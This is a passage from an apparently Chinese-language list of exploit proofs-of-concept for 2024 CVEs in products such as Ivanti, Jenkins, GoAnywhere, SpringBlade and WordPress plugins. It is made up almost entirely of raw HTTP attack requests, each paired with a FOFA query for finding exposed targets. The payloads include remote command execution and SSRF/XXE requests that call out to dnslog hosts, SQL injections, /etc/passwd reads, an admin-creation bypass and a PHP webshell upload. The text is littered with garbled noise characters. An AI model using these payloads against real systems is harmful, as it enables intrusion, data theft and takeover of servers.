7 G/ m ~# c. Y0 eAccept-Encoding: gzip, deflate
; _; [9 G1 ]# j; ]2 h! V- O& jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: K- O& R3 z( Y! E' YContent-Type: application/x-www-form-urlencoded; charset=UTF-8! I& n. L" r1 q) c7 B" \2 C7 _: ^
X-Requested-With: XMLHttpRequest& D6 ^4 i6 k, B; b# j5 V: N' q |
; p6 p: D. P, B) U3 p
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B/ w+ s4 j. Q( D/ F
- V+ S; H& t4 M8 R2 s) D* m# K- f/ ~# B* H- k. x/ |# }& t8 W
99. Ncast盈可视高清智能录播系统busiFacade RCE
# k( @9 T# v6 q! o4 J. E' WCVE-2024-03050 r1 w1 m) T& ]3 m8 U9 @9 k
FOFA:app="Ncast-产品" && title=="高清智能录播系统"5 `2 g8 @0 Y; ]" |
POST /classes/common/busiFacade.php HTTP/1.16 `+ r: x4 L- X6 R
Host: 192.168.40.130:8080
( o* P" C0 d6 N% r1 p, X/ y- uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0. M, G* K; J7 A" }0 u
Connection: close" D7 C; S* W0 r( Y+ X
Content-Length: 154
3 @# C% O8 Y/ ^$ ]Accept: */*2 s: z2 C4 E2 ^6 k
Accept-Encoding: gzip, deflate
1 h$ z. Y5 A9 ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, y) r3 `* B- _
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
0 z# ~2 X: ^/ t, D3 AX-Requested-With: XMLHttpRequest1 m6 h4 g* p w9 b0 O
9 g1 P7 V! H E+ ~- B" D( c0 K& _%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D- c/ w- p$ |- e! x0 G9 i8 j
- x% [7 K: w1 k5 R4 Q# r/ d; s5 F9 ]+ f6 l$ B; k; C6 b
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
$ w3 c' d2 Y" \8 c' q" B6 S4 @CVE-2024-0352
; s% M3 E" r! e3 lFOFA:icon_hash="874152924"
% ?* ?" y) ]) K- ~5 i# a) @6 Q/ PPOST /api/file/formimage HTTP/1.14 o5 M0 Y# G& p Z% }& h: W- L: E
Host: 192.168.40.130. q& i1 I4 f5 ^0 ^+ q( E
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
) Y) a0 k# H R( r$ ?: tConnection: close
" k1 R f9 [: CContent-Length: 2014 [+ d7 u, {: g& y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei$ u; O; X5 ^$ L3 s; W4 G
Accept-Encoding: gzip
% y! h6 O( A7 o _' |. o( b4 @% r7 S3 a8 s5 Z+ j% p
------WebKitFormBoundarygcflwtei# a$ V- j/ _7 ~
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
: T! n7 W* F5 O; [) }3 j, e, _Content-Type: application/x-php
' X5 R/ i6 \. B, Z3 s+ Z4 f! {
9 }: r& ~) k9 Q( H: J9 u2ayyhRXiAsKXL8olvF5s4qqyI2O
* t0 g, i: M, j3 b------WebKitFormBoundarygcflwtei--
8 B: d8 U/ P% S( I( z1 |, y, L
1 Y1 I: g) B& E, e# L) z! n! r- p6 d5 t9 r: ?5 n
101. ivanti policy secure-22.6命令注入
1 D; R3 x' J! m- \/ B8 u/ Z# c9 tCVE-2024-21887
3 {7 a, \$ x, b3 v2 F5 X1 fFOFA:body="welcome.cgi?p=logo"
4 p/ s( N' D8 b: W" M0 E, E+ LGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
% _% j% i; z% j" zHost: x.x.x.xx.x.x.x
$ Z1 Y. f* x0 k; D% TUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.366 R. _" P! C- G" R
Connection: close
3 e1 S' z2 {1 k& b8 q* ~Accept-Encoding: gzip0 {( k$ D" {0 |) s/ | } q
9 f" `4 u6 D( u6 q% e8 K9 @: k
9 W" H& l7 _7 L/ a& C5 {. X; ^7 U
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行5 n& t8 w/ k2 k% A- J
CVE-2024-21893
6 r, x! ]+ {) p. h* e" ~4 e! pFOFA:body="welcome.cgi?p=logo"
5 o% S3 q9 ~" A2 q$ R7 g. i; tPOST /dana-ws/saml20.ws HTTP/1.1
1 a" M) w( T& ~2 N N( CHost: x.x.x.x
8 d( p0 @( E% ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36, |1 Y. M1 w- y8 [! V0 d
Connection: close+ [/ Y1 A8 m' Q6 |
Content-Length: 792
7 T8 h) r+ r! {! t6 f% lAccept-Encoding: gzip* d! `, Y' v2 ?
7 Q* h; _% |3 Z' U
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>9 @( G3 R$ Q4 B. E. s ?* `3 J
; L: z4 `2 s4 t* G
103. Ivanti Pulse Connect Secure VPN XXE
, I" B, l- W1 p1 {- _3 d/ t8 oCVE-2024-220244 V5 ]/ Z2 z C5 h3 _) N
FOFA:body="welcome.cgi?p=logo". T7 C& P& j8 A" b% p8 W" v
POST /dana-na/auth/saml-sso.cgi HTTP/1.11 @6 `: B9 C+ w
Host: 192.168.40.130:111
' Z% {- E. Q0 \/ hUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
; s I6 x& o6 YConnection: close
: m1 T) ^# u0 JContent-Length: 204: Y# Z6 i, P! H7 v; z
Content-Type: application/x-www-form-urlencoded
c$ j. V0 @' f* O2 Y% `Accept-Encoding: gzip8 b* D+ W- `! t" J
6 ~( f. n; g: r+ C9 c! K" C
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
% x9 }# z- o+ h, x. G
( m) H* V8 B$ A8 }1 p D3 O% A; P
- T% \0 e! ~3 e6 N其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
) y) @" V$ ^# Y! Z8 f% n4 _) K<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
" T" x/ x1 k$ M. O8 E
& s+ [' y% i4 t! l7 `- G$ J* c9 F. l% A) i! i& d4 G3 M
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
# H2 s G2 m$ E" H# }; A) xCVE-2024-0569
2 c# e! ?/ q6 sFOFA:title="TOTOLINK"6 z& c% y: b% A- ?$ Z, {7 B, r* b9 e
POST /cgi-bin/cstecgi.cgi HTTP/1.1
) R( V" z' T4 O+ i# x8 G& ? D6 QHost:192.168.0.1; d$ ]( P( m. |( D2 I' u: a
Content-Length:41% \0 R8 e$ ^+ J# _
Accept:application/json,text/javascript,*/*;q=0.01
- Q! O q4 S4 W& g; `- z4 aX-Requested-with: XMLHttpRequest
$ p' x, t9 m) W0 b% g& WUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.366 ]) D* K; R x$ o. p: l
Content-Type: application/x-www-form-urlencoded:charset=UTF-8# n6 H5 q% t! p0 M, V# C2 `& l
Origin: http://192.168.0.1
# ?: z2 U6 M$ W6 J4 X; bReferer: http://192.168.0.1/advance/index.html?time=1671152380564 M% A c0 _, z
Accept-Encoding:gzip,deflate
7 p+ t1 G; F* D$ ^* j: TAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.71 Y- v/ }/ A) v/ Y4 `0 ~
Connection:close; s5 N0 H' A' r u
" s& I, x6 r8 _- Q, o{
4 E" R2 u0 L5 n3 L P"topicurl":"getSysStatusCfg",' Z/ E7 |- }* u3 `+ h
"token":""1 r4 z1 {" }, d6 W' Y* c
}
) j5 _! l! O5 P: N3 I' U+ a+ e- ^
6 Z9 m% H& j. S- y, x105. SpringBlade v3.2.0 export-user SQL 注入
7 @/ E( w$ s. @: Y9 I7 ZFOFA:body="https://bladex.vip". I* D, d5 b; h+ q' T0 k
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
% c. J3 c1 R3 ~ p# Z. S0 _& f" u, B8 r5 `! A
106. SpringBlade dict-biz/list SQL 注入 K3 k' Y. a( p" Q! M
FOFA:body="Saber 将不能正常工作"
+ R0 x7 h: Z/ {4 ^3 ^1 n0 nGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
8 {) k1 r4 m$ T- r4 x; z& RHost: your-ip5 ]5 F0 G; k& T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% S# f1 w3 F* V1 n8 L4 xBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
2 E3 ?7 r) T0 X, h* i4 A1 ?, t" _Accept-Encoding: gzip, deflate/ \" _1 m1 H9 v. S3 o" s
Accept-Language: zh-CN,zh;q=0.9, S5 F$ [- }- Y3 M/ M
Connection: close
5 R% k6 y5 L8 q: m6 U3 f) W0 c# [) A- d" [# O; K& p2 ?
& }) ?: o g' Q' g/ ^, ^
107. SpringBlade tenant/list SQL 注入
# t0 Z/ m( h7 t: e Y+ E9 a1 ZFOFA:body="https://bladex.vip"
/ ]2 C3 ^6 k+ a, T, ^/ u @GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1. j0 S- ^, Z6 m1 T( Q: V0 d+ c
Host: your-ip
7 w- X" ~( G5 D9 D# R* w$ lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( [. q2 _. c: C" ]
Blade-Auth:替换为自己的+ X8 P1 ^# {0 }& n3 [
Connection: close
/ F& o- w9 } J& X" x! t# h
: ]( p. ~% P) X8 M, W7 d/ |* j9 m. v; E/ I$ S+ B
108. D-Tale 3.9.0 SSRF
6 i# C5 T. k" k4 _- {5 vCVE-2024-21642$ }% d8 t3 j0 z" w3 G# h+ T
FOFA:"dtale/static/images/favicon.png"8 H' S& j! b9 G. W8 {) P& F! B
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1. n$ o4 ?- L* Z
Host: your-ip
8 t' Y5 ?: ]. V- K7 P, O( gAccept: application/json, text/plain, */*
/ o& q T/ M5 z5 |+ PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36% E; {# D2 U k, |$ H/ T
Accept-Encoding: gzip, deflate
" D6 X2 v( {6 `" G f3 j. a" zAccept-Language: zh-CN,zh;q=0.9,en;q=0.8( Q8 U5 t: _+ ?. _; J6 v7 Z1 s4 v
Connection: close
2 F' ^! M) G8 x- }1 v0 |; P/ k$ l4 O9 y7 E5 I* Y+ x/ s$ U
4 W1 ?8 \+ r5 h# p9 Q, k
109. Jenkins CLI 任意文件读取$ A& z. B t h5 Q
CVE-2024-23897
/ @4 r0 N& ^6 L/ SFOFA:header="X-Jenkins"
6 z; t# z% H- S9 Y8 ?POST /cli?remoting=false HTTP/1.1
4 t4 ?+ s, `$ @! _( [Host:' ?" ]; E G5 V$ M5 b8 q1 Q( @4 ?
Content-type: application/octet-stream
( c0 Q8 M" K# b. J& w( H) DSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
9 L) i4 q% x! c8 T+ lSide: upload
( y4 u0 K* W: L4 |, b: kConnection: keep-alive6 c) t. \% \* P+ q# M9 X) O
Content-Length: 163
: i) ?' ~9 @5 j' P: Q6 T
" I- {( _. K! k0 v: k4 K3 Rb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03' ]0 w; D" H( C& d* F! x, [
* v* f* s3 b/ Z0 R/ i
: l4 `. G3 S8 x1 g3 F/ D
POST /cli?remoting=false HTTP/1.15 x" ~- Z" b w$ C, ]2 B2 z
Host:
9 i) R1 K4 j5 F' V. O7 a- SSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92. Z8 d X2 l. A. X8 G& ?
download( b+ s/ p0 r- t3 f9 X4 s e: E$ @
Content-Type: application/x-www-form-urlencoded2 g O- g N2 D
Content-Length: 0
( v* O" P2 q; z/ f
+ U; q( P4 a* h( k; x5 c/ o; H) H2 }6 b4 n" |0 A4 {, f: g
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin) P% c+ J$ u s5 R& J
java -jar jenkins-cli.jar help
1 a+ ?; @7 W' h" P[COMMAND]' N6 I7 C/ S; a
Lists all the available commands or a detailed description of single command.' U5 N' }7 R8 l% F. {* w
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
; N- S! v6 h5 z: d/ F% J
9 y, T$ U* W; K1 Y* {, K" T) \) }4 a. E1 @
110. Goanywhere MFT 未授权创建管理员
. D* k4 u& ~8 R+ B( }CVE-2024-0204
' [/ H% G1 q2 Y! A8 c7 VFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"3 ^$ E0 H" K1 `
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
6 t8 V; p& c8 ?9 s9 o$ G& KHost: 192.168.40.130:8000
0 ?+ W; t" e2 X* ?- ~+ K CUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 I- `4 ~# d8 O) N5 K
Connection: close
/ n" b. B y' b8 bAccept: */*' S3 n% F. ^5 Y5 {4 q
Accept-Language: en
# ]: M# t7 I9 ]; KAccept-Encoding: gzip1 j ^1 \# d5 f: h' ]* J+ p6 E
+ [! Q0 n; t5 [1 U6 l" o# l; t L: E9 ~/ \0 F" g* L
111. WordPress Plugin HTML5 Video Player SQL注入
$ `6 r. u5 F4 u, Q, kCVE-2024-1061
, S5 b/ I: J9 s: CFOFA:"wordpress" && body="html5-video-player"2 F3 u2 j! j8 F' k" o
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1. x: {+ h; C w! v9 T3 h
Host: 192.168.40.130:112# b0 b& n) p- A/ c5 h+ N
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36: a4 J, d1 F+ r& J2 u S: {, c# y
Connection: close
% n" n2 V. c/ E0 i$ e- B, AAccept: */*
1 h3 ~; G) ~7 w u4 _0 u( fAccept-Language: en6 t- p4 C. e' U8 g( n+ q
Accept-Encoding: gzip
% D ^) n* ?$ b0 ]$ v0 d1 K' s$ t+ _" Z7 T+ U9 ~# Q
5 k2 P( z2 @* n* `
112. WordPress Plugin NotificationX SQL 注入5 E% m$ G- v5 Y! X
CVE-2024-1698% ~ O; M' s5 \. ]* ?7 h, r$ z4 F
FOFA:body="/wp-content/plugins/notificationx"
( c* j& c+ F1 d2 f& }POST /wp-json/notificationx/v1/analytics HTTP/1.1
& r0 R* |% O: F2 I7 @+ y/ jHost: {{Hostname}}& N8 H5 a3 F: H
Content-Type: application/json
3 f! E+ @0 o/ B) K) F# g3 w7 k! U! R& Z" P/ h7 K+ V4 A
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
) L/ S. w, B# C$ M2 E
2 q/ C6 B, S3 v$ p- w3 K, m! |. g( O( D
113. WordPress Automatic 插件任意文件下载和SSRF
+ U9 D' d3 H& {CVE-2024-27954
) {0 R3 t) P9 rFOFA:"/wp-content/plugins/wp-automatic"/ y/ X" K' y3 y# Y* s" l
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1/ x0 W# h' L. j' S0 ?. P
Host: x.x.x.x6 Q+ T' v" \" q; u4 R# n6 H6 B
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.362 [$ D X- p2 q! `
Connection: close- y/ T3 W, [/ ^' L
Accept: */*
s5 v! H2 L4 s1 yAccept-Language: en- k' V6 ?* J, `* W, Z
Accept-Encoding: gzip1 @% g; v5 S& l
. |2 c0 W8 V5 X
% X3 B, v. A8 a) N
114. WordPress MasterStudy LMS插件 SQL注入. x P: j0 }# ?8 D5 P# Q
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/", ]. W: \6 Q, g# M& Z
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
2 ]6 }7 K$ P4 _+ _Host: your-ip
! _' C" i: m- Q8 Y4 o% ZUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36& h! g1 j+ A, Q( a) Z" _# E
Accept-Charset: utf-8& l/ }/ {4 q* G/ b" O
Accept-Encoding: gzip, deflate4 b |" N" I0 f6 b
Connection: close
1 X/ e2 {: X7 |8 H; y! y' L8 H' q7 `# p
2 W; c, c0 x: q3 F% ^% R S3 S$ k
115. WordPress Bricks Builder <= 1.9.6 RCE
4 _0 f/ O5 _; K' V* ECVE-2024-256004 A6 C$ G, b- G' |
FOFA: body="/wp-content/themes/bricks/"
( W: m' g6 B! w/ T第一步,获取网站的nonce值
/ b7 W4 K& X* u/ }! R- PGET / HTTP/1.1
. D ?, \4 |7 H* BHost: x.x.x.x5 Z. d Y7 l: a7 X! h$ p0 n X0 a* K
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36% G- \" J$ I/ |! l
Connection: close: w3 |/ ]. ~6 R3 O* l& [+ {2 c4 |% y) k
Accept-Encoding: gzip& l3 g3 R2 H' E, H
5 s, ~3 m7 ^' z$ Y% F9 D9 N3 ^0 q5 P$ s3 B( O, H( y
第二步替换nonce值,执行命令
+ o- t7 i: @! P; D5 \POST /wp-json/bricks/v1/render_element HTTP/1.1
5 f, G( S% h6 ?$ g" V" _& ~0 [Host: x.x.x.x
; v6 t9 m! t, I4 V2 a' dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.369 o+ f7 W1 j5 T# U0 S2 Z2 P
Connection: close
2 u5 Z! g1 r2 }+ O$ P. BContent-Length: 356
4 j, y7 T& |5 }1 l, U! mContent-Type: application/json
( J- C6 }% f) D/ X1 {, F5 n+ qAccept-Encoding: gzip
+ Q4 P; E5 I& t% x e
' |) X* b4 e$ j' O# v% j- E0 a{
3 S2 u4 ^" T$ T9 z" t0 ["postId": "1",
6 v% ?$ M" f. q; }3 V9 u, i r; [! v "nonce": "第一步获得的值",) m+ p+ ^! S$ c% @& i
"element": {1 j/ `4 r* ]- w8 t1 ^
"name": "container",
$ n' ]0 Y1 {, V. N' T( o$ z: d "settings": {- g( `* b3 N0 O) b
"hasLoop": "true",+ D, l- H: ]& d$ r: C* a
"query": {5 D8 r6 Z5 s/ o
"useQueryEditor": true,3 f; s- B0 r% k
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
9 G% B1 M- T. B" K. R "objectType": "post". }, S$ C- x2 c- q
}, `) Q, |& L) ~8 L; e* a) f |5 V, T8 Q
}
6 a! `" c- r1 J1 {- A6 k+ H }2 R5 ^% s' Q% w: ~& S* T' \9 g
}
! t& a% `! a7 [9 u. n' `' ~8 v* o6 _( C* {) Z
9 {0 Z- R/ w) i' |& `116. wordpress js-support-ticket文件上传; I" S! S6 ^) ]3 T+ H
FOFA:body="wp-content/plugins/js-support-ticket"
6 e; Q' p0 u( @" B9 B% OPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
6 K7 X, r/ X+ MHost:, r t/ F: S. o
Content-Type: multipart/form-data; boundary=--------767099171
! y- h$ a* |, @ T" W+ P3 BUser-Agent: Mozilla/5.0; t, K* R; K O2 \1 Y/ f8 p
* u: c$ t/ L8 N6 s
----------767099171, Q. n: s0 @ T1 u7 S3 M$ x
Content-Disposition: form-data; name="action"" u0 }# ?) C2 ]8 \1 g0 _1 G
configuration_saveconfiguration5 v0 E4 j8 e! o9 H3 `8 `& p
----------767099171
+ _8 V8 J# F' M7 ?) KContent-Disposition: form-data; name="form_request"* j' x" ~5 j. B) y
jssupportticket) n! |) E7 J" V) H, V/ j
----------767099171
" o; W9 @0 o4 SContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
: g" x3 X- Y6 t; L- Y+ ?1 p5 |Content-Type: image/png' f2 T% E3 N. V' g* o0 \3 Y
----------767099171--9 Q: @/ W5 k( z% c. d! c
- `9 h1 f1 N. J! Q& ]4 u9 ?8 ?3 g: f# O4 O/ K
117. WordPress LayerSlider插件SQL注入9 E9 f& s! X" G& G/ j
version:7.9.11 – 7.10.00 A7 e# m; _ e- Y' @
FOFA:body="/wp-content/plugins/LayerSlider/"5 n; D, u( _$ _% j5 W
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1% ]# U( Z& n1 ^& d4 }# D. m
Host: your-ip {1 I& ? g$ J. K$ ~; l( P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
% J" o+ Z. Y/ ?, m, W3 U- g# i* QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# t) r7 s: t* nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) w. ~/ Q3 H7 C# b& L2 {* Y* uAccept-Encoding: gzip, deflate, br
0 Q2 j7 r/ v. n! OConnection: close3 z n/ n9 F( F. y2 y" p+ V
Upgrade-Insecure-Requests: 1
3 L+ R7 l9 U9 v+ b2 Y) ^; g+ i- w7 t p" e' T4 y3 u
5 l0 V2 d6 b; n* E; w118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
9 R' A- s) [8 @1 y. E5 @4 o: i9 xCVE-2024-0939
& Z; ?* k# m: u+ Q( YFOFA:title="Smart管理平台". m$ y6 \: X' h6 x+ H
POST /Tool/uploadfile.php? HTTP/1.1
: K1 D; o3 X1 O! m* _Host: 192.168.40.130:8443
0 m) }9 Z' v6 J0 t v# W: kCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
+ I/ x4 l& L+ Z/ l% K4 J; SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
9 y! x' f. K) Q! p3 Z: h( n7 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 N) I' i7 z4 K; a2 x" dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& W2 |0 N, s% L# g
Accept-Encoding: gzip, deflate+ f) V" i) `* I) @
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
& Q- V3 h D4 ^2 ]1 o; l$ p( TContent-Length: 405: t: t6 L' o& ~/ Y" S3 x- r
Origin: https://192.168.40.130:8443
$ A5 `6 ~7 `. m" W- KReferer: https://192.168.40.130:8443/Tool/uploadfile.php
1 a& m( w( b5 M5 l M% JUpgrade-Insecure-Requests: 1
f7 l: m4 X0 c6 b6 o; ~Sec-Fetch-Dest: document
$ U. f3 u6 c( D8 A/ _( c9 M# D, {Sec-Fetch-Mode: navigate0 p3 U" I8 j3 [6 E! E
Sec-Fetch-Site: same-origin
2 s; }8 R& V% T! gSec-Fetch-User: ?12 e, N' M8 i0 f2 U6 q; Q, e
Te: trailers9 Q; |0 ]2 G7 m3 a0 E* e
Connection: close9 [# j& E+ W9 ~) p2 s% z
8 T& G9 T: a1 @) M
-----------------------------13979701222747646634037182887
$ a1 m' ~$ o9 x( ] L$ {Content-Disposition: form-data; name="file_upload"; filename="contents.php" w! o5 w N4 j# k- x4 L, N2 X
Content-Type: application/octet-stream
2 V5 l% r, x% o, ?3 y) S. W1 Z. @6 e9 P) ~6 {/ E- p3 ]* p7 q( K+ B
<?php
, ]9 X- t$ [: \( u# { usystem($_POST["passwd"]);
3 \% B1 p1 P; m H/ V! k- e?>( h. b$ P# h$ p, `- c
-----------------------------13979701222747646634037182887! z0 O% |3 L7 a5 @: C+ X6 I
Content-Disposition: form-data; name="txt_path"
9 _7 K" \( ]3 `3 U9 r7 u' n! c+ A9 j) X" ~ b% g
/home/src.php2 r+ R$ Y2 N* D1 a
-----------------------------13979701222747646634037182887--
2 q; q. ^3 k7 C( A, @+ y8 L- ^0 y4 D( L( V* u' p4 D
1 W2 ]. c. e2 v) M
访问/home/src.php$ j4 O9 d9 }0 g3 D& e4 |6 R
' ]8 _5 Y7 H* X6 [119. 北京百绰智能S20后台sysmanageajax.php sql注入
! d6 D; S1 e8 b* w0 R6 }5 kCVE-2024-12541 ~ V7 x, p2 s1 l2 W" v5 w$ ?
FOFA:title="Smart管理平台"
3 m) X t" x3 |0 S+ Y先登录进入系统,默认账号密码为admin/admin
1 t1 c/ \* G1 V# BPOST /sysmanage/sysmanageajax.php HTTP/1.11" v) P, d# u& u' {1 l/ U* J0 H1 |5 E
Host: x.x.x.x
- u3 J q, z# Y3 D7 E4 s9 R: ICookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee1 | g4 b8 g9 [4 H# W- F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
' E g7 [; s- K7 E. G+ FAccept: */*
- |1 T# y8 }' `+ OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 I. Z Z* S! R, K! m/ A# W4 R
Accept-Encoding: gzip, deflate; B' M+ A$ b+ z; j9 n! [
Content-Type: application/x-www-form-urlencoded;" H/ l& C+ \- W4 [3 B" X* B% c J
Content-Length: 1092 m% A' p/ c& D( D9 T% m/ q! p7 K
Origin: https://58.18.133.60:84438 d8 ~, S5 y, [, K4 T
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php3 b8 Y, S/ d- B% q
Sec-Fetch-Dest: empty
